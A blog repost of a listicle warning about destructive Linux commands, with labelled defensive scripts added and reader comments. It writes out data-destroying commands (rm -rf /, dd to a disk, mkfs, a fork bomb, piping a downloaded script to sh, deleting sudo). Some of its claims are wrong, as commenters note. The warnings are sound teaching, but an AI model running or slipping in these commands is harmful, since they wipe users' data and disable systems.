Friday 30 December 2016

9 Lethal Linux Commands You Should Never Run



Delete Recursively

The Linux ability to delete anything you want without question is a godsend, especially after dealing with years of “That file can’t be deleted” errors in Windows. But Internet trolls will be quick to deceive you, presenting you with extremely dangerous removal commands that can wipe entire hard drives.
rm -rf /
This line runs the remove command rm with two flags: -r, which makes the deletion recursive through all subdirectories, and -f, which forces deletion of read-only files without confirmation. The command is executed on the root directory /, essentially wiping your whole system clean.
Note that on most Linux systems these days you would get a warning if you tried this. But the warning isn't guaranteed, so just don't do it.
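The two ways this command most often gets run by accident are an unset variable (so that rm -rf "$BUILD_DIR"/ quietly becomes rm -rf /) and a path that merely resolves to the root, such as "/." or a symlink. The guard below is an added example, not code from the original article or from makeuseof.com; the function names safe_rm_target and safe_rm_rf are its own, and the warning the article mentions comes from GNU rm's default --preserve-root behaviour.

```shell
#!/bin/sh
# Added example (not from the original article). A guard for recursive
# deletes against the two classic ways "rm -rf /" happens by accident:
#   1. an unset or empty variable:  rm -rf "$BUILD_DIR"/  becomes  rm -rf /
#   2. a path that merely *resolves* to the root: "/.", "/usr/..", a symlink to /
# Function names (safe_rm_target, safe_rm_rf) are this example's own.

# safe_rm_target PATH
# Returns 0 if PATH is an acceptable target for a recursive delete, 1 otherwise.
# Resolution uses cd + pwd -P, so it works in POSIX sh without GNU realpath.
safe_rm_target() {
    target=$1

    # Empty string: almost always an unset variable. Refuse loudly.
    if [ -z "$target" ]; then
        echo "refusing: empty target (unset variable?)" >&2
        return 1
    fi

    # Nothing at that path: nothing to delete, and nothing to guard.
    if [ ! -e "$target" ]; then
        echo "refusing: '$target' does not exist" >&2
        return 1
    fi

    # Only a directory can resolve to the root; plain files pass.
    [ -d "$target" ] || return 0

    # Canonical physical path: follows symlinks, collapses "." and "..".
    # CDPATH is cleared so a relative name cannot be redirected elsewhere.
    resolved=$(unset CDPATH; cd -- "$target" 2>/dev/null && pwd -P) || return 1
    case "$resolved" in
        /|//)
            echo "refusing: '$target' resolves to the filesystem root" >&2
            return 1
            ;;
    esac
    return 0
}

# safe_rm_rf PATH
# Deletes recursively only after the check passes. --preserve-root (the GNU
# rm default behind the warning the article mentions) and --one-file-system
# are GNU coreutils options; drop them on BSD rm.
safe_rm_rf() {
    safe_rm_target "$1" || return 1
    rm -rf --preserve-root --one-file-system -- "$1"
}

# Demonstration on a scratch directory; nothing outside it is touched.
scratch=$(mktemp -d)
safe_rm_target "$scratch" && echo "accepted: $scratch"
safe_rm_target "/."       || echo "rejected: /. (resolves to /)"
safe_rm_target ""         || echo "rejected: empty target"
rmdir "$scratch"
```

The empty-string check is the one that matters most in scripts: quote every expansion and consider `set -u` so an unset variable aborts the script instead of expanding to nothing.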

Format Hard Drive

The terminal is especially tricky for Linux newbies because it provides several ways to accidentally wipe one’s hard drive. Recursive deletion is a big one, but here’s another:
mkfs.ext3 /dev/hda
This command formats the hard drive to use the ext3 filesystem. Disk drive formatting is not an inherently malicious action, but it does “reset” the drive such that it’s “as good as new”. In other words, a formatted hard drive is like a blank slate.
Formatting is useful for disk partitions and external drives, but executing it on an entire hard drive (such as /dev/hda) is dangerous and can leave your system in an unrecoverable state.


Overwrite Hard Drive


As if accidental disk formatting wasn’t bad enough, it’s possible to overwrite your hard drive using raw data. At least disk formatting is an actual procedure with real-life uses; directly overwriting one’s drive, on the other hand, is not so great.
command > /dev/hda
In the command above, command can be replaced by any Bash command. The > operator redirects the output from the command on its left to the file on its right. In this case, it doesn’t matter what the output of the left command is. That raw data is being redirected and used to overwrite the system hard drive.
As you can imagine, this renders it useless.

Wipe Hard Drive

Here’s another way to ruin your system. This time around, the command will completely zero out your hard drive. No data corruptions or overwrites; it will literally fill your hard drive with zeroes. A hard drive doesn’t get any more wiped than that.
dd if=/dev/zero of=/dev/hda
The dd command is a low-level utility that copies raw data and is often used to write directly to physical drives. The if parameter determines the source of the data, which in this case is /dev/zero, a special file on Linux that produces an infinite stream of zeroes. The of parameter determines the destination of those zeroes, which is the /dev/hda drive.
Yes, there are legitimate reasons for zeroing a drive, but if you don’t know what those reasons are, then you’ll want to stay away from this command.
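The formatting, redirect and dd sections above all share one precondition a practitioner checks first: is the target disk, or any partition on it, still carrying a mounted filesystem? The check below is an added example, not code from the original article or from makeuseof.com. It reads /proc/mounts (or a file you pass in, so it can be run against a constructed sample offline); the function names device_in_use and sample_mounts_file and the sample mount table are its own.

```shell
#!/bin/sh
# Added example (not from the original article). Before any command that
# writes to a whole disk (mkfs, dd, a ">" redirect), check whether that disk,
# or any partition on it, currently carries a mounted filesystem. The check
# reads /proc/mounts, or a file you pass in, so it can be run against a sample.
# Function names (device_in_use, sample_mounts_file) are this example's own.

# device_in_use DEVICE [MOUNTS_FILE]
# Returns 0 (true) and reports the mount if DEVICE or a partition of it is
# mounted, 1 otherwise. Partition naming covers both sda -> sda1 and
# nvme0n1 -> nvme0n1p1 / mmcblk0 -> mmcblk0p1. The prefix match errs toward
# a false positive (nvme0n1 also matches nvme0n10), which is the safe side.
device_in_use() {
    dev=$1
    mounts=${2:-/proc/mounts}
    in_use=1
    while read -r src mountpoint fstype _rest; do
        case "$src" in
            "$dev"|"$dev"[0-9]*|"$dev"p[0-9]*)
                echo "in use: $src is mounted on $mountpoint ($fstype)" >&2
                in_use=0
                ;;
        esac
    done < "$mounts"
    return $in_use
}

# Constructed sample of /proc/mounts content (not captured from a real host),
# written to a temp file so the example runs offline. Prints the file name.
sample_mounts_file() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
/dev/nvme0n1p1 /boot vfat rw,fmask=0022 0 0
tmpfs /run tmpfs rw,nosuid 0 0
EOF
    printf '%s\n' "$f"
}

# Demonstration against the sample.
m=$(sample_mounts_file)
for dev in /dev/sda /dev/sdb /dev/nvme0n1; do
    if device_in_use "$dev" "$m"; then
        echo "$dev: refuse to format/overwrite"
    else
        echo "$dev: no mounted filesystems found (still confirm with lsblk)"
    fi
done
rm -f "$m"
```

On a real host, `lsblk -f` and `findmnt` show the same information interactively; the point of scripting the check is that a wipe or format step in an automated job refuses to proceed instead of relying on the operator having typed the right device name.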

Implode Hard Drive

If you’re tired of hearing ways to wreck your hard drive, hang on. Here’s one more for you. On Linux, there’s a special file called /dev/null that will discard whatever data is written to it. You can think of it as a black hole or a file shredder: anything given to it as input will be eaten up for good.
mv / /dev/null
Can you spot the danger here? The mv command tries to move the system’s root directory / into the black hole of /dev/null. This is a valid command and the result is devastating: the hard drive gets eaten up and there’s nothing left. Doing this will make your system unusable.

Cause Kernel Panic

Windows has its infamous Blue Screen of Death. And despite the myths that float around, Linux is not a perfectly secure system. Sometimes an internal error occurs from which recovery is impossible, and the system halts with something similar to the Blue Screen: a kernel panic.
dd if=/dev/random of=/dev/port

echo 1 > /proc/sys/kernel/panic

cat /dev/port

cat /dev/zero > /dev/mem
The intricacies of the above commands aren’t important here. What is important is that running any of those lines will result in a kernel panic, forcing you to reboot your system. It’s best to stay away from these commands unless you’re absolutely sure you know what you’re doing.

Fork Bomb

Bash is the language of the Linux terminal and it’s powerful. Not only can it run commands but it can also run functions, which makes it easy to write scripts that can automate system tasks. Unfortunately, functions don’t come without their own set of risks.

:(){:|:&};:
This obscure command is called a fork bomb, which is a special type of kernel panic. It defines a function named : that recursively calls itself twice when executed. One of the recursive calls happens in the foreground while the other happens in the background.
In other words, whenever this function executes, it spawns two child processes. Those child processes spawn their own child processes, and this cycle keeps going in an infinite loop. The only way out of it is to reboot the system.
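The standard containment for a fork bomb is a per-user process limit: pam_limits applies the nproc entries in /etc/security/limits.conf at login, and the running shell reports the result as ulimit -u. The script below is an added example, not code from the original article or from makeuseof.com; it checks a limits.conf-style file for the hard nproc limit that would apply to a given user. The function names nproc_hard_limit and sample_limits_file and the sample configuration are its own.

```shell
#!/bin/sh
# Added example (not from the original article). The standard containment for
# a fork bomb is a per-user process limit: pam_limits reads
# /etc/security/limits.conf, and the shell exposes the result as `ulimit -u`.
# This checks a limits.conf-style file for the hard "nproc" limit that would
# apply to a user. Function names (nproc_hard_limit, sample_limits_file) are
# this example's own.

# nproc_hard_limit USER FILE
# Prints the hard nproc limit that applies to USER: a user-specific line wins
# over the "*" wildcard. Lines with type "-" set both soft and hard, so they
# count. Exit status 1 if no applicable line exists. Group entries (@group)
# and the fact that "*" does not cover root are deliberately not modelled.
nproc_hard_limit() {
    awk -v user="$1" '
        NF == 0 || $1 ~ /^#/ { next }                 # blank lines and comments
        $3 == "nproc" && ($2 == "hard" || $2 == "-") {
            if ($1 == user)     specific = $4
            else if ($1 == "*") wildcard = $4
        }
        END {
            if (specific != "") { print specific; exit 0 }
            if (wildcard != "") { print wildcard; exit 0 }
            exit 1
        }' "$2"
}

# Constructed sample limits.conf (not from a real host).
sample_limits_file() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
# /etc/security/limits.conf -- constructed sample
# <domain>  <type>  <item>  <value>
*           soft    nproc   2048
*           hard    nproc   4096
alice       hard    nproc   512
@devs       hard    nproc   8192
*           hard    nofile  65536
EOF
    printf '%s\n' "$f"
}

# Demonstration: what would contain a fork bomb started by each user?
f=$(sample_limits_file)
for u in alice bob; do
    if limit=$(nproc_hard_limit "$u" "$f"); then
        echo "$u: at most $limit processes (a fork bomb stalls at that point)"
    else
        echo "$u: no nproc limit configured; fork bomb bounded only by the kernel"
    fi
done
rm -f "$f"
```

Compare the configured value with `ulimit -u` in a fresh login shell for that user; a session can lower its own soft limit with `ulimit -S -u N` before experimenting on a live CD. On systemd hosts the per-service and per-session `TasksMax=` (and `DefaultTasksMax=` in system.conf) bound the same thing through the pids cgroup controller.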

Execute Remote Script

Here’s an innocent command that can actually be useful in day-to-day life on a Linux system. wget retrieves the contents of a web URL, which can be used to access websites or download files. However, there’s a simple trick that turns it dangerous:
wget http://an-untrusted-url -O- | sh
The above combination downloads the contents of the given URL and immediately feeds it to the sh command, which executes the downloaded contents in the terminal. If the URL were to point to a malicious script, you’d be sealing your own fate with this command.
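The safe version of this pattern is to download to a file, verify it against a digest obtained from a channel other than the download itself, and only then execute it. The helper below is an added example, not code from the original article or from makeuseof.com; the function names sha256_of, verify_sha256 and fetch_verify_run, and the all-zero placeholder digest, are its own.

```shell
#!/bin/sh
# Added example (not from the original article). The safe pattern for
# "wget URL | sh" is: download to a file, verify it against a hash obtained
# from a channel other than the download itself (release notes, a signed
# announcement), and only then execute it. Function names (sha256_of,
# verify_sha256, fetch_verify_run) and the placeholder hash are this example's own.

# sha256_of FILE -> prints the hex digest; uses sha256sum (GNU) or shasum (BSD/macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED_HEX -> 0 if the digest matches (case-insensitive), 1 otherwise.
verify_sha256() {
    actual=$(sha256_of "$1") || return 1
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    echo "checksum mismatch for $1" >&2
    echo "  expected: $expected" >&2
    echo "  actual:   $actual" >&2
    return 1
}

# fetch_verify_run URL EXPECTED_HEX
# Downloads URL to a temp file, refuses to run it unless the checksum matches,
# and removes the file afterwards. Use -O file, never -O-, so the script can
# be read (`less "$tmp"`) before anything executes.
fetch_verify_run() {
    url=$1
    expected=$2
    tmp=$(mktemp) || return 1
    if ! wget -q -O "$tmp" -- "$url"; then
        echo "download failed: $url" >&2
        rm -f "$tmp"
        return 1
    fi
    if verify_sha256 "$tmp" "$expected"; then
        sh "$tmp"
        rc=$?
    else
        rc=1
    fi
    rm -f "$tmp"
    return $rc
}

# Offline demonstration: a constructed local file standing in for a download.
demo=$(mktemp)
printf 'echo hello from a verified script\n' > "$demo"
echo "digest of the demo file: $(sha256_of "$demo")"
# A deliberately wrong, placeholder digest: verification must fail.
verify_sha256 "$demo" 0000000000000000000000000000000000000000000000000000000000000000 \
    || echo "refused to run: digest did not match"
rm -f "$demo"
```

A digest published next to the download on the same server only proves the transfer was intact, not that the server is trustworthy; a detached signature checked with `gpg --verify` against a key you already hold is the stronger control, and reading the script before running it costs nothing.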

Disable Root Command Rights

This final command is straightforward. It uses the everyday rm command to remove two of the most important commands on Linux: sudo and su. Long story short, these two allow you to run other commands with root permissions. Without them, life on Linux would be miserable.
rm -f /usr/bin/sudo;rm -f /bin/su
That is why you shouldn't run this command. It force-deletes both binaries from your system without any confirmation, leaving you in a jam. There are ways to restore what you've deleted, but it's not always straightforward, nor will it be pleasant.
Source: makeuseof.com

7 comments:

  1. An entertaining article! I've actually run many of these commands as part of daily tasks: e.g. reformatting an external hard drive (mkfs), or zeroing out an old hard drive (dd if=/dev/zero) before selling or tossing a computer.

    One note, though: a fork bomb is not a kernel panic... True, it can eventually lead to out-of-memory errors, but it can also run for a good bit (quite spectacularly!), simply causing the system to be slower and slower. You can even stop it after the fact by killing the parent process (the shell) and all its child processes, although I don't recall how precisely. Linux does kill misbehaving processes which consume too much memory (the OOM killer https://linux-mm.org/OOM_Killer), but it looks like it doesn't handle fork bombs since the memory usage is spread across many (small) child processes.

    As I wrote this post, I ran a fork bomb on a live CD to confirm my memory. The X11 screen froze before a kernel panic ever displayed. (I wonder whether doing it from a virtual terminal would act differently...) Thanks for reminding me of the joy of that! I recommend trying that on a live CD or fresh install to anyone who hasn't seen the OS come to such a dramatic halt!

    Replies
    1. Also, do you *really* have an IDE disk in 2016? Wow! I haven't seen hda in a while... (A SATA disk is listed as sda.)

  2. You can still have an IDE disk without an IDE interface. I still have one or maybe two IDE CD drives/writers, but on an IDE/SATA converter, so they report as scd{0,1}, while in fact at least one of them is an IDE drive. But I admit, having IDE disk drives anno 2016 is rare.

  3. "mv / /dev/null" should fail with an error message, since /dev/null is (treated) as a file.

    I tried a harmless example "mv dir file", and it failed with "mv: cannot overwrite non-directory 'file' with directory 'dir'".

  4. Saying disk formatting makes it clean is absolutely false; it doesn't touch most of the on-disk data, only the parts that happen to be where the filesystem needs to place its own data.

    Wiping/overwriting a drive is the process where the drive is cleaned; while there's no such thing as truly clean, that's the closest, as the drive will still have either zeros or ones as its content. I guess it's a structural limitation.

    Replies
    1. And I'm not fully sure about moving the root filesystem to a black hole, whether it actually deletes the data or just writes to filesystem internals that the space is available.

    2. You would be correct in most cases, though it may depend on the file system and setup. If you were to move the file system to a black hole, you should be able to recover some of the data with a ton of work and good tools, but you would need to unmount the drive right away and clone it with dd. Now if you really want to have some fun, run Linux off a mem drive or live CD. Mount the partition off the hard drive, move the contents to /dev/null, then defrag the partition and then resize it to say 50%. Create a new partition with the extra space and alternate writing 1 and 0 to the new partition for, let's say, 7 times. Then remove the new partition, resize the old partition back to 100% and see how many files you can recover. Should be an interesting experiment.
